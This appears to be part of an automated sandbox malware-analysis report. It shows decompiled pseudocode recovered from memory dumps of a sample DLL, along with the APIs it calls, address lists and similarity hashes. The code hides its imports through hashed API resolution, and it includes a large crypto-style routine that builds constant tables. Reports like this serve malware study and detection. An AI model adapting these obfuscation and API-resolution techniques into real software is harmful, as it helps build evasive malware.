					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E1001303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E10013670(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E1001303C(0x10154545, 0x5b739044) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x10015ba9
0x10015bb0
0x10015bb3
0x10015be1
0x10015bea
0x10015bf0
0x10015bf1
0x10015be3
0x10015be5
0x10015be5
0x10015c07
0x10015c1b
0x10015c09
0x10015c16
0x10015c18
0x10015c18
0x10015c1d
0x10015c22
0x10015c30
0x10015c9b
0x10015c9e
0x10015c32
0x10015c37
0x10015c84
0x10015c88
0x10015c92
0x10015c92
0x10015c88
0x10015c39
0x10015c45
0x10015c4a
0x10015c5e
0x10015c60
0x10015c61
0x10015c62
0x10015c64
0x10015c66
0x10015c67
0x10015c67
0x10015c6a
0x10015c6a
0x10015c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 10015C16

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction ID: e4d31513e87dbfd5acc6bee4198fe9ffca51be495168d8515339d3d1bbe0f17d
Opcode Fuzzy Hash: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction Fuzzy Hash: 3E01F96534434AFFF750DA614C82F7B3389DB8119AF154425FA014D186DE37D8D58161

Uniqueness

Uniqueness Score: -1.00%

Function 10015B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E10015B8B(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E1001303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E1000C2B0(_t23);
				if(E1000C2C4(_t23) != 0) {
					_t31[2] = E100135C8(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E1001303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E10013670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E1001303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x10015b8b
0x10015b92
0x10015be1
0x10015bea
0x10015bf0
0x10015bf1
0x10015be3
0x10015be5
0x10015be5
0x10015c07
0x10015c1b
0x10015c09
0x10015c16
0x10015c18
0x10015c18
0x10015c1d
0x10015c22
0x10015c30
0x10015c9b
0x10015c9e
0x10015c32
0x10015c37
0x10015c84
0x10015c88
0x10015c92
0x10015c92
0x10015c88
0x10015c39
0x10015c45
0x10015c4a
0x10015c5e
0x10015c60
0x10015c61
0x10015c62
0x10015c64
0x10015c66
0x10015c67
0x10015c67
0x10015c6a
0x10015c6a
0x10015c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 10015C16

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction ID: 2035665c3a6d1a50f7b900be770213736b69a013dc6d4cb6f492b649e791d400
Opcode Fuzzy Hash: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction Fuzzy Hash: 1501473538434EFFF660DA608C82F7B338CDB4128AF144425BA015D082DE37E9D4C1A0

Uniqueness

Uniqueness Score: -1.00%

Function 10015BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E10015BD9(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E1001303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E1000C2B0(_t23);
				if(E1000C2C4(_t23) != 0) {
					_t31[2] = E100135C8(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E1001303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E10013670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E1001303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x10015bd9
0x10015bdd
0x10015be1
0x10015bea
0x10015bf0
0x10015bf1
0x10015be3
0x10015be5
0x10015be5
0x10015c07
0x10015c1b
0x10015c09
0x10015c16
0x10015c18
0x10015c18
0x10015c1d
0x10015c22
0x10015c30
0x10015c9b
0x10015c9e
0x10015c32
0x10015c37
0x10015c84
0x10015c88
0x10015c92
0x10015c92
0x10015c88
0x10015c39
0x10015c45
0x10015c4a
0x10015c5e
0x10015c60
0x10015c61
0x10015c62
0x10015c64
0x10015c66
0x10015c67
0x10015c67
0x10015c6a
0x10015c6a
0x10015c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 10015C16

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction ID: e0e8bcabed8dc63b91bede62824bf2a6a021874631e4e0a6567cb8a788a45a37
Opcode Fuzzy Hash: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction Fuzzy Hash: CB01F77538034EFFF6609A618C82F7B778DDB41199F044425BA115D182DE37E9D5C1A0

Uniqueness

Uniqueness Score: -1.00%

Function 10011054, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E10011054(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E10013044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x8b9d0da3
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x10011062
0x10011064
0x10011072
0x10011076
0x100110bf
0x00000000
0x100110bf
0x1001107b
0x1001107c
0x1001107e
0x10011083
0x00000000
0x1001109c
0x100110a0
0x100110ad
0x100110b1
0x00000000
0x00000000
0x00000000
0x100110ba

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,8B9D0DA3,00000004,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 100110AD

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction ID: 6fa310f27a16fe1d68700eabd8a43550a900cd784662b3de4d3f426fb27664da
Opcode Fuzzy Hash: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction Fuzzy Hash: E2F0AF74648342ABEA45D5288C15F7B62DEEBC8644F01C82CB940DF190EAB9DDC49226

Uniqueness

Uniqueness Score: -1.00%

Function 10015624, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10015624(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E1001303C(0x8b9d0da7, 0x73b21bac) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E1000E670(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x1001562e
0x10015630
0x10015637
0x10015639
0x1001563d
0x1001563f
0x10015642
0x10015645
0x10015645
0x1001565f
0x00000000
0x00000000
0x10015670
0x10015674
0x00000000
0x00000000
0x10015682
0x10015685
0x1001568a
0x1001568f
0x1001568f

APIs

RegEnumValueA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,00000000,8B9D0DA7,73B21BAC,?,?,8B9D0DA7,73B21BAC), ref: 10015670

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction ID: 7a66e07cfdc9c604c7766fd622bcc8056923a0ce24da0e7865e2be01c98af935
Opcode Fuzzy Hash: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction Fuzzy Hash: 5CF0C2B5204309BEE7609E1ACC44DB7BBEDEBD0B94F05852EB4D547200DA32EC5089B0

Uniqueness

Uniqueness Score: -1.00%

Function 10015E5C, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10015E5C(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E1000C2C4(_t19) == 0) {
					_v12 = _a8;
					if(E1001303C(0x10154545, 0x73afd997) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E100135C8(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x10015e5f
0x10015e61
0x10015e6d
0x10015e77
0x10015e8d
0x10015eac
0x10015e8f
0x10015ea0
0x10015ea4
0x10015ec4
0x10015ea6
0x10015ea6
0x10015ea6
0x10015ea4
0x10015ead
0x10015eb2
0x10015ebb
0x10015eb4
0x10015eb4
0x10015eb6
0x10015eb6
0x10015e6f
0x10015e6f
0x10015e6f
0x10015ec1

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,10154545,73AFD997,?,?,?,10015D51,00000000,?,00000000,?), ref: 10015EA0

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction ID: 00a1010064f58baf6d91f08a182d95c2db7a62c90b0e42ac54bbed0e39186a17
Opcode Fuzzy Hash: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction Fuzzy Hash: 20F0A431A08306EFD7A5DA34CC01A6B77D9EF48281F158C2ABC94CF244EA33D9858661

Uniqueness

Uniqueness Score: -1.00%

Function 10013600, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E10013600(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x1001d228 == 0x8c456a83) {
					_t7 = E1001303C(0xfe338407, 0x82fffbdc);
					 *0x1001d22c = E1001303C(0xfe338407, 0xc09bf2f8);
					if( *0x1001d228 == 0x8c456a83) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x1001d228 = 0;
					}
				}
				_t3 = E1001303C(0xfe338407, 0xdb278333);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x1001d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x10013608
0x10013610
0x10013643
0x10013654
0x1001365f
0x1001366a
0x1001366c
0x1001366c
0x1001365f
0x1001361c
0x10013623
0x00000000
0x10013625
0x10013625
0x10013626
0x10013628
0x1001362a
0x1001362b
0x00000000
0x1001362b

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,FE338407,C09BF2F8,FE338407,82FFFBDC,?,?,00000000,1000DE41,?,?), ref: 1001366A

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 62f6723f458b51ba0ee2fbcd3e4be15e44e964bb8dfb95ea0d1a1e813a852ad3
Instruction ID: 668a2a63bcda89cfb4ee132f6677b6ddc00b679fc001ade77ae74a06d2e95ed3
Opcode Fuzzy Hash: 62f6723f458b51ba0ee2fbcd3e4be15e44e964bb8dfb95ea0d1a1e813a852ad3
Instruction Fuzzy Hash: 37F02779144191BDE620EAF2AD04D57F7C4EB99391B30C829F984DF781D871C8C29225

Uniqueness

Uniqueness Score: -1.00%

Function 00241588, Relevance: 1.4, APIs: 1, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0024164B

Memory Dump Source

Source File: 00000003.00000002.2362889137.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aa960015ad8cca5cc961b60b974ed8e840caa0568e62abb3c52f47a068550a6b
Instruction ID: 1eccefce8f641db58bcaee543a5cf1a3ad58eb6ae17245e8f47b33a9afc3d666
Opcode Fuzzy Hash: aa960015ad8cca5cc961b60b974ed8e840caa0568e62abb3c52f47a068550a6b
Instruction Fuzzy Hash: 635120B5D112098FCB08CFA9D584AAEBBF0FF48344F15856EE809AB351D3759891CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0024258E, Relevance: 1.4, APIs: 1, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00242652

Part of subcall function 00241588: VirtualAlloc.KERNELBASE ref: 0024164B

Memory Dump Source

Source File: 00000003.00000002.2362889137.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID: AllocSleepVirtual
String ID:
API String ID: 503295252-0
Opcode ID: 324cb5194ccb7042230a18e94df9d0d3e328bcb4eb0b9986bedaae3da66475a8
Instruction ID: 93e29e3f9416276519067016546c0c334a9d3544614c4e408e917d6918c18122
Opcode Fuzzy Hash: 324cb5194ccb7042230a18e94df9d0d3e328bcb4eb0b9986bedaae3da66475a8
Instruction Fuzzy Hash: D34118B4E1020ACFCB08DFA9D4916AEBBF0FF48310F55852AE906A7341D735A990CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10001494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E10001494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E1000F5A8( &_v72, 0);
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v76, E1000F4F0( &_v76) + 0x10);
				E1000F4E0( &_v80, E1000F4F0( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v84, E1000F4F0(_t325) + 0x10);
				E1000F4E0( &_v88, E1000F4F0( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v92, E1000F4F0(_t329) + 0x10);
				E1000F4E0( &_v96, E1000F4F0( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v100, E1000F4F0(_t333) + 0x10);
				E1000F4E0( &_v104, E1000F4F0( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v108, E1000F4F0(_t337) + 0x10);
				E1000F4E0( &_v112, E1000F4F0( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v116, E1000F4F0(_t341) + 0x10);
				E1000F4E0( &_v120, E1000F4F0( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v124, E1000F4F0(_t345) + 0x10);
				E1000F4E0( &_v128, E1000F4F0( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v132, E1000F4F0(_t349) + 0x10);
				E1000F4E0( &_v136, E1000F4F0( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v140, E1000F4F0(_t353) + 0x10);
				E1000F4E0( &_v144, E1000F4F0( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v148, E1000F4F0(_t357) + 0x10);
				E1000F4E0( &_v152, E1000F4F0( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v156, E1000F4F0(_t361) + 0x10);
				E1000F4E0( &_v160, E1000F4F0( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v164, E1000F4F0(_t365) + 0x10);
				E1000F4E0( &_v168, E1000F4F0( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v172, E1000F4F0(_t369) + 0x10);
				E1000F4E0( &_v176, E1000F4F0( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v180, E1000F4F0(_t373) + 0x10);
				E1000F4E0( &_v184, E1000F4F0( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v188, E1000F4F0(_t377) + 0x10);
				E1000F4E0( &_v192, E1000F4F0( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v196, E1000F4F0(_t381) + 0x10);
				E1000F4E0( &_v200, E1000F4F0( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v204, E1000F4F0(_t385) + 0x10);
				E1000F4E0( &_v208, E1000F4F0( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E100141D8(0xfe338407, _t434);
				E1000F4E0( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E1000F4E0( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E1000F4E0( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E1000F4E0( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E1000F4E0( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E1000F4E0( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E1000F4E0( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E1000F4E0( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E1000F4E0( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E1000F4E0( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E1000F4E0( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
